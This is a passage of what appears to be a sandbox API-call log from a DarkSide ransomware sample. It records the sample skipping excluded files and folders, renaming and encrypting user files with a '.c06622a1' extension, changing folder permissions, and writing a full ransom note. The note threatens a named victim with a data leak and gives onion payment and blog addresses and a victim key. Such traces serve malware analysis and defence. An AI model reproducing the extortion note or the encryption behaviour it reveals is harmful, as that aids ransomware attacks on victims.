(_String="desktop.ini") returned 0xb [0150.008] _wcsicmp (_Str1="iconcache.db", _Str2="Web Slice Gallery.url") returned -14 [0150.008] wcslen (_String="iconcache.db") returned 0xc [0150.008] _wcsicmp (_Str1="ntldr", _Str2="Web Slice Gallery.url") returned -9 [0150.008] wcslen (_String="ntldr") returned 0x5 [0150.008] _wcsicmp (_Str1="ntuser.dat", _Str2="Web Slice Gallery.url") returned -9 [0150.008] wcslen (_String="ntuser.dat") returned 0xa [0150.008] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Web Slice Gallery.url") returned -9 [0150.008] wcslen (_String="ntuser.dat.log") returned 0xe [0150.009] _wcsicmp (_Str1="ntuser.ini", _Str2="Web Slice Gallery.url") returned -9 [0150.009] wcslen (_String="ntuser.ini") returned 0xa [0150.009] _wcsicmp (_Str1="thumbs.db", _Str2="Web Slice Gallery.url") returned -3 [0150.009] wcslen (_String="thumbs.db") returned 0x9 [0150.009] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.009] wcslen (_String="386") returned 0x3 [0150.009] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.009] wcslen (_String="adv") returned 0x3 [0150.009] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.009] wcslen (_String="ani") returned 0x3 [0150.009] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.009] wcslen (_String="bat") returned 0x3 [0150.009] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.009] wcslen (_String="bin") returned 0x3 [0150.009] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.009] wcslen (_String="cab") returned 0x3 [0150.009] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.009] wcslen (_String="cmd") returned 0x3 [0150.009] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.009] wcslen (_String="com") returned 0x3 [0150.009] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.009] wcslen (_String="cpl") returned 0x3 [0150.009] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.010] wcslen (_String="cur") returned 0x3 [0150.010] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.010] wcslen (_String="deskthemepack") returned 0xd [0150.010] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.010] wcslen (_String="diagcab") returned 0x7 [0150.010] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.010] wcslen (_String="diagcfg") returned 0x7 [0150.010] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.010] wcslen (_String="diagpkg") returned 0x7 [0150.010] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.010] wcslen (_String="dll") returned 0x3 [0150.010] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.010] wcslen (_String="drv") returned 0x3 [0150.010] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.010] wcslen (_String="exe") returned 0x3 [0150.010] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.010] wcslen (_String="hlp") returned 0x3 [0150.010] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.010] wcslen (_String="icl") returned 0x3 [0150.010] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.010] wcslen (_String="icns") returned 0x4 [0150.010] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.010] wcslen (_String="ico") returned 0x3 [0150.011] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.011] wcslen (_String="ics") returned 0x3 [0150.011] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.011] wcslen (_String="idx") returned 0x3 [0150.011] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.011] wcslen (_String="ldf") returned 0x3 [0150.011] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.011] wcslen (_String="lnk") returned 0x3 [0150.011] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.011] wcslen (_String="mod") returned 0x3 [0150.011] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.011] wcslen (_String="mpa") returned 0x3 [0150.011] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.011] wcslen (_String="msc") returned 0x3 [0150.011] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.011] wcslen (_String="msp") returned 0x3 [0150.011] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.011] wcslen (_String="msstyles") returned 0x8 [0150.011] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.011] wcslen (_String="msu") returned 0x3 [0150.011] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.011] wcslen (_String="nls") returned 0x3 [0150.012] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.012] wcslen (_String="nomedia") returned 0x7 [0150.012] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.012] wcslen (_String="ocx") returned 0x3 [0150.012] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.012] wcslen (_String="prf") returned 0x3 [0150.012] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.012] wcslen (_String="ps1") returned 0x3 [0150.012] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.012] wcslen (_String="rom") returned 0x3 [0150.012] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.012] wcslen (_String="rtp") returned 0x3 [0150.012] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.012] wcslen (_String="scr") returned 0x3 [0150.012] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.012] wcslen (_String="shs") returned 0x3 [0150.012] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.012] wcslen (_String="spl") returned 0x3 [0150.012] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.012] wcslen (_String="sys") returned 0x3 [0150.012] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.012] wcslen (_String="theme") returned 0x5 [0150.012] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.013] wcslen (_String="themepack") returned 0x9 [0150.013] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.013] wcslen (_String="wpx") returned 0x3 [0150.013] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.013] wcslen (_String="lock") returned 0x4 [0150.013] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.013] wcslen (_String="key") returned 0x3 [0150.013] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.013] wcslen (_String="hta") returned 0x3 [0150.013] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.013] wcslen (_String="msi") returned 0x3 [0150.013] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.013] wcslen (_String="pdb") returned 0x3 [0150.013] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.013] wcslen (_String="sql") returned 0x3 [0150.013] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.013] wcslen (_String="sqlite") returned 0x6 [0150.013] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 0x11 [0150.013] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.013] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0150.014] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 0x31 [0150.014] wcscpy (in: _Dest=0x45000f4, _Source="Web Slice Gallery.url" | out: _Dest="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0150.014] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x80) returned 1 [0150.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0150.024] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.024] ReadFile (in: hFile=0x620, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0150.025] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x24cfcbb0 [0150.025] RtlComputeCrc32 (PartialCrc=0xcbb0, Buffer=0x3fe8f4, Length=0x80) returned 0x53df1c0f [0150.025] RtlComputeCrc32 (PartialCrc=0x1c0f, Buffer=0x3fe8f4, Length=0x80) returned 0xbcef504c [0150.025] RtlComputeCrc32 (PartialCrc=0x504c, Buffer=0x3fe8f4, Length=0x80) returned 0x562ac2c9 [0150.025] RtlComputeCrc32 (PartialCrc=0xc2c9, Buffer=0x3fe8f4, Length=0x80) returned 0x40d4a575 [0150.025] CloseHandle (hObject=0x620) returned 1 [0150.025] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.025] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" [0150.026] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 0x47 [0150.026] wcscpy (in: _Dest=0x4510126, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.026] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.c06622a1"), dwFlags=0x8) returned 1 [0150.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0150.048] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.048] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x638e03db [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41db6708 [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1a847425 [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36aecc91 [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfc650d1 [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x18609d33 [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x656e9931 [0150.053] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d22212 [0150.056] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xbec24b63 [0150.056] RtlComputeCrc32 (PartialCrc=0x4b63, Buffer=0x2f30094, Length=0x80) returned 0x98a801dc [0150.056] RtlComputeCrc32 (PartialCrc=0x1dc, Buffer=0x2f30094, Length=0x80) returned 0xe5eaac0d [0150.056] RtlComputeCrc32 (PartialCrc=0xac0d, Buffer=0x2f30094, Length=0x80) returned 0x2929eed8 [0150.056] RtlComputeCrc32 (PartialCrc=0xeed8, Buffer=0x2f30094, Length=0x80) returned 0x291a6a2a [0150.056] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.056] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.056] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.056] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.057] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0150.057] _wcsicmp (_Str1="backup", _Str2="Links") returned -10 [0150.057] wcslen (_String="backup") returned 0x6 [0150.057] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0150.057] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0150.057] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0150.057] _wcsicmp (_Str1="$recycle.bin", _Str2="Microsoft Websites") returned -73 [0150.057] wcslen (_String="$recycle.bin") returned 0xc [0150.057] _wcsicmp (_Str1="config.msi", _Str2="Microsoft Websites") returned -10 [0150.057] wcslen (_String="config.msi") returned 0xa [0150.057] _wcsicmp (_Str1="$windows.~bt", _Str2="Microsoft Websites") returned -73 [0150.057] wcslen (_String="$windows.~bt") returned 0xc [0150.057] _wcsicmp (_Str1="$windows.~ws", _Str2="Microsoft Websites") returned -73 [0150.057] wcslen (_String="$windows.~ws") returned 0xc [0150.057] _wcsicmp (_Str1="windows", _Str2="Microsoft Websites") returned 10 [0150.057] wcslen (_String="windows") returned 0x7 [0150.057] _wcsicmp (_Str1="appdata", _Str2="Microsoft Websites") returned -12 [0150.058] wcslen (_String="appdata") returned 0x7 [0150.058] _wcsicmp (_Str1="application data", _Str2="Microsoft Websites") returned -12 [0150.058] wcslen (_String="application data") returned 0x10 [0150.058] _wcsicmp (_Str1="boot", _Str2="Microsoft Websites") returned -11 [0150.058] wcslen (_String="boot") returned 0x4 [0150.058] _wcsicmp (_Str1="google", _Str2="Microsoft Websites") returned -6 [0150.058] wcslen (_String="google") returned 0x6 [0150.058] _wcsicmp (_Str1="mozilla", _Str2="Microsoft Websites") returned 6 [0150.058] wcslen (_String="mozilla") returned 0x7 [0150.058] _wcsicmp (_Str1="program files", _Str2="Microsoft Websites") returned 3 [0150.058] wcslen (_String="program files") returned 0xd [0150.058] _wcsicmp (_Str1="program files (x86)", _Str2="Microsoft Websites") returned 3 [0150.058] wcslen (_String="program files (x86)") returned 0x13 [0150.058] _wcsicmp (_Str1="programdata", _Str2="Microsoft Websites") returned 3 [0150.058] wcslen (_String="programdata") returned 0xb [0150.058] _wcsicmp (_Str1="system volume information", _Str2="Microsoft Websites") returned 6 [0150.058] wcslen (_String="system volume information") returned 0x19 [0150.058] _wcsicmp (_Str1="tor browser", _Str2="Microsoft Websites") returned 7 [0150.058] wcslen (_String="tor browser") returned 0xb [0150.058] _wcsicmp (_Str1="windows.old", _Str2="Microsoft Websites") returned 10 [0150.058] wcslen (_String="windows.old") returned 0xb [0150.058] _wcsicmp (_Str1="intel", _Str2="Microsoft Websites") returned -4 [0150.058] wcslen (_String="intel") returned 0x5 [0150.058] _wcsicmp (_Str1="msocache", _Str2="Microsoft Websites") returned 10 [0150.058] wcslen (_String="msocache") returned 0x8 [0150.058] _wcsicmp (_Str1="perflogs", _Str2="Microsoft Websites") returned 3 [0150.058] wcslen (_String="perflogs") returned 0x8 [0150.058] _wcsicmp (_Str1="x64dbg", _Str2="Microsoft Websites") returned 11 [0150.058] wcslen (_String="x64dbg") returned 0x6 [0150.058] _wcsicmp (_Str1="public", _Str2="Microsoft Websites") returned 3 [0150.058] wcslen (_String="public") returned 0x6 [0150.058] _wcsicmp (_Str1="all users", _Str2="Microsoft Websites") returned -12 [0150.058] wcslen (_String="all users") returned 0x9 [0150.058] _wcsicmp (_Str1="default", _Str2="Microsoft Websites") returned -9 [0150.058] wcslen (_String="default") returned 0x7 [0150.058] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0150.058] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0150.058] wcscpy (in: _Dest=0x44b00c0, _Source="Microsoft Websites" | out: _Dest="Microsoft Websites") returned="Microsoft Websites" [0150.059] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0150.059] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0150.059] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0150.059] GetNamedSecurityInfoW () returned 0x0 [0150.059] SetEntriesInAclW () returned 0x0 [0150.059] SetNamedSecurityInfoW () returned 0x0 [0150.071] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57b58) returned 1 [0150.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.071] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 1 [0150.072] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.072] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.072] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.073] CloseHandle (hObject=0x678) returned 1 [0150.073] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.073] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0150.073] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="" [0150.073] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 0x3f [0150.073] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0150.073] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd811b260, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd811b260, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.073] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0150.074] _wcsicmp (_Str1="IE Add-on site.url", _Str2="README.c06622a1.TXT") returned -9 [0150.074] wcsstr (_Str="IE Add-on site.url", _SubStr="README") returned 0x0 [0150.074] _wcsicmp (_Str1="autorun.inf", _Str2="IE Add-on site.url") returned -8 [0150.074] wcslen (_String="autorun.inf") returned 0xb [0150.074] _wcsicmp (_Str1="boot.ini", _Str2="IE Add-on site.url") returned -7 [0150.074] wcslen (_String="boot.ini") returned 0x8 [0150.074] _wcsicmp (_Str1="bootfont.bin", _Str2="IE Add-on site.url") returned -7 [0150.074] wcslen (_String="bootfont.bin") returned 0xc [0150.074] _wcsicmp (_Str1="bootsect.bak", _Str2="IE Add-on site.url") returned -7 [0150.074] wcslen (_String="bootsect.bak") returned 0xc [0150.074] _wcsicmp (_Str1="desktop.ini", _Str2="IE Add-on site.url") returned -5 [0150.074] wcslen (_String="desktop.ini") returned 0xb [0150.074] _wcsicmp (_Str1="iconcache.db", _Str2="IE Add-on site.url") returned -2 [0150.074] wcslen (_String="iconcache.db") returned 0xc [0150.074] _wcsicmp (_Str1="ntldr", _Str2="IE Add-on site.url") returned 5 [0150.074] wcslen (_String="ntldr") returned 0x5 [0150.074] _wcsicmp (_Str1="ntuser.dat", _Str2="IE Add-on site.url") returned 5 [0150.074] wcslen (_String="ntuser.dat") returned 0xa [0150.074] _wcsicmp (_Str1="ntuser.dat.log", _Str2="IE Add-on site.url") returned 5 [0150.074] wcslen (_String="ntuser.dat.log") returned 0xe [0150.074] _wcsicmp (_Str1="ntuser.ini", _Str2="IE Add-on site.url") returned 5 [0150.074] wcslen (_String="ntuser.ini") returned 0xa [0150.074] _wcsicmp (_Str1="thumbs.db", _Str2="IE Add-on site.url") returned 11 [0150.074] wcslen (_String="thumbs.db") returned 0x9 [0150.074] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.074] wcslen (_String="386") returned 0x3 [0150.074] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.074] wcslen (_String="adv") returned 0x3 [0150.074] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.074] wcslen (_String="ani") returned 0x3 [0150.074] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.074] wcslen (_String="bat") returned 0x3 [0150.074] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.074] wcslen (_String="bin") returned 0x3 [0150.074] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.074] wcslen (_String="cab") returned 0x3 [0150.074] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.075] wcslen (_String="cmd") returned 0x3 [0150.075] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.075] wcslen (_String="com") returned 0x3 [0150.075] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.075] wcslen (_String="cpl") returned 0x3 [0150.075] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.075] wcslen (_String="cur") returned 0x3 [0150.075] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.075] wcslen (_String="deskthemepack") returned 0xd [0150.075] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.075] wcslen (_String="diagcab") returned 0x7 [0150.075] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.075] wcslen (_String="diagcfg") returned 0x7 [0150.075] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.075] wcslen (_String="diagpkg") returned 0x7 [0150.075] _wcsicmp 